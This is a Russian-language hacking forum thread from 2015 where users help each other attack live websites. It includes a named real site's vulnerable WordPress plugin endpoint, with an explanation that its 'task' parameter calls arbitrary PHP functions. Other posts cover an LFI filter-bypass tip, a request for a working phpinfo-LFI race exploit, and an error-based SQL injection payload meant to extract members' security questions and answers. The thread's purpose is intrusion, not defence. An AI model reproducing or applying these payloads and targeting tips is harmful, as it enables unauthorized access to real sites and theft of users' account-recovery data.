 |
|
14.05.2015, 02:50
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Да, всё пробовала. Архив с темой тоже нельзя загружать
Version 3.9.6
|
|
|
14.05.2015, 17:23
|
|
Новичок
Регистрация: 08.05.2013
Сообщений: 16
С нами:
6849686
Репутация:
0
|
|
Ребята, если есть LFI на сайте вида site.ru/param/LFI/1.
Поможет если слешдоты перевести в %HE%XX
|
|
|
|
14.05.2015, 21:13
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
С нами:
9597253
Репутация:
82
|
|
Код:
kratko-news.com/wp-content/plugins/wpgrabber/test.php?ajax=1&task=phpinfo
можно ли вывести что то кроме пхпинфо? вроде все перепробовал, нефига не хочет |
|
|
|
15.05.2015, 11:02
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от mazaxaka
↑
Код:
kratko-news.com/wp-content/plugins/wpgrabber/test.php?ajax=1&task=phpinfo
можно ли вывести что то кроме пхпинфо? вроде все перепробовал, нефига не хочет
Лезем на офф сайт - http://wpgrabber.ru/ , качаем плагин.
Открывает test.php
В самом начала видим:
Код:
if ($_GET['ajax']) {
$task = $_GET['task'];
//sleep(1);
$result = $task();
exit();
В самом конце видим:
Код:
function __start()
{
$('#display').html('');
$('#sbmt').hide();
$('#loading').show();
__echo('1. Тестированиe внешних запросов из php-функции file_get_contents()...');
$.get('?ajax=1&task=testFileGetContents', function( data ) {
__echo( data );
__echo('
2. Тестированиe работы библиотеки CURL...');
$.get('?ajax=1&task=testCurl', function( data ) {
__echo( data );
__echo('
3. Тестированиe внешних запросов из php-функции copy()...');
$.get('?ajax=1&task=testCopy', function( data ) {
__echo( data );
__echo('
4. Тестированиe сохранения файла из php-функции file_get_contents()...');
$.get('?ajax=1&task=testFileGetContentsSaveFile', function( data ) {
__echo( data );
__echo('
5. Тестированиe сохранения файла с помощью библиотеки CURL...');
$.get('?ajax=1&task=testCurlSaveFile', function( data ) {
__echo( data );
__echo('
Тестирование завершено!');
$('#sbmt').show();
$('#loading').hide();
То есть доступными функциями для тестирования будут те, которые описаны в скрипте + те, для вызоав которых не нужна передача аргументов.
Потому что итоговая строка строится как $func= $_GET['task'].'()'
Такие функции для php можешь посмотреть здесь -> http://php.net/manual/ru/ref.info.php
|
|
|
|
15.05.2015, 20:06
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
С нами:
9597253
Репутация:
82
|
|
Сообщение от BigBear
↑
Лезем на офф сайт -
http://wpgrabber.ru/
, качаем плагин.
Открывает test.php
В самом начала видим:
Код:
if ($_GET['ajax']) {
$task = $_GET['task'];
//sleep(1);
$result = $task();
exit();
В самом конце видим:
Код:
function __start()
{
$('#display').html('');
$('#sbmt').hide();
$('#loading').show();
__echo('1. Тестированиe внешних запросов из php-функции file_get_contents()...');
$.get('?ajax=1&task=testFileGetContents', function( data ) {
__echo( data );
__echo('
2. Тестированиe работы библиотеки CURL...');
$.get('?ajax=1&task=testCurl', function( data ) {
__echo( data );
__echo('
3. Тестированиe внешних запросов из php-функции copy()...');
$.get('?ajax=1&task=testCopy', function( data ) {
__echo( data );
__echo('
4. Тестированиe сохранения файла из php-функции file_get_contents()...');
$.get('?ajax=1&task=testFileGetContentsSaveFile', function( data ) {
__echo( data );
__echo('
5. Тестированиe сохранения файла с помощью библиотеки CURL...');
$.get('?ajax=1&task=testCurlSaveFile', function( data ) {
__echo( data );
__echo('
Тестирование завершено!');
$('#sbmt').show();
$('#loading').hide();
То есть доступными функциями для тестирования будут те, которые описаны в скрипте + те, для вызоав которых не нужна передача аргументов.
Потому что итоговая строка строится как $func= $_GET['task'].'()'
Такие функции для php можешь посмотреть здесь ->
http://php.net/manual/ru/ref.info.php
понятно, значит вариант дохлый,даже файлы конфига не прочитать
|
|
|
|
15.05.2015, 21:26
|
|
Новичок
Регистрация: 08.05.2013
Сообщений: 16
С нами:
6849686
Репутация:
0
|
|
Ребята, пробую phpinfo LFI пробить.
Во всех случаях временный файл удаляется раньше инклуда.
Ни у кого нету 100% рабочего сплойта, который не удаляется?
Отчего зависит время жизни tmp файла?
|
|
|
|
16.05.2015, 00:25
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от sunnyfruit
↑
Ребята, пробую phpinfo LFI пробить.
Во всех случаях временный файл удаляется раньше инклуда.
Ни у кого нету 100% рабочего сплойта, который не удаляется?
Отчего зависит время жизни tmp файла?
как узнал, что удаляется? уверен, что создается? пробовал эксплоит написать, чтобы не вручную это делать?
|
|
|
|
17.05.2015, 06:24
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
блин,вот всё из таблиц могу вывести,но вот нужную колонку никак не хочет выводить,мож я что не так делаю,запрос такой
'and(select 1 from(select count(*),concat((SELECT security_question FROM member WHERE member_id =1000),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ????
может ещё есть какой вариант
|
|
|
|
17.05.2015, 13:53
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от madam
↑
блин,вот всё из таблиц могу вывести,но вот нужную колонку никак не хочет выводить,мож я что не так делаю,запрос такой
'and(select 1 from(select count(*),concat((SELECT security_question FROM member WHERE member_id =1000),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ????
может ещё есть какой вариант
не смотрел корректность вектора, но запрос верный. какая ошибка? может там waf на member?
|
|
|
|
17.05.2015, 14:34
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
Сообщение от faza02
↑
не смотрел корректность вектора, но запрос верный. какая ошибка? может там waf на member?
ошибку не показывает,просто обновляется страница,хотя из member можно извлечь всё кроме security_question и security_answer,(самые нужные)))
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
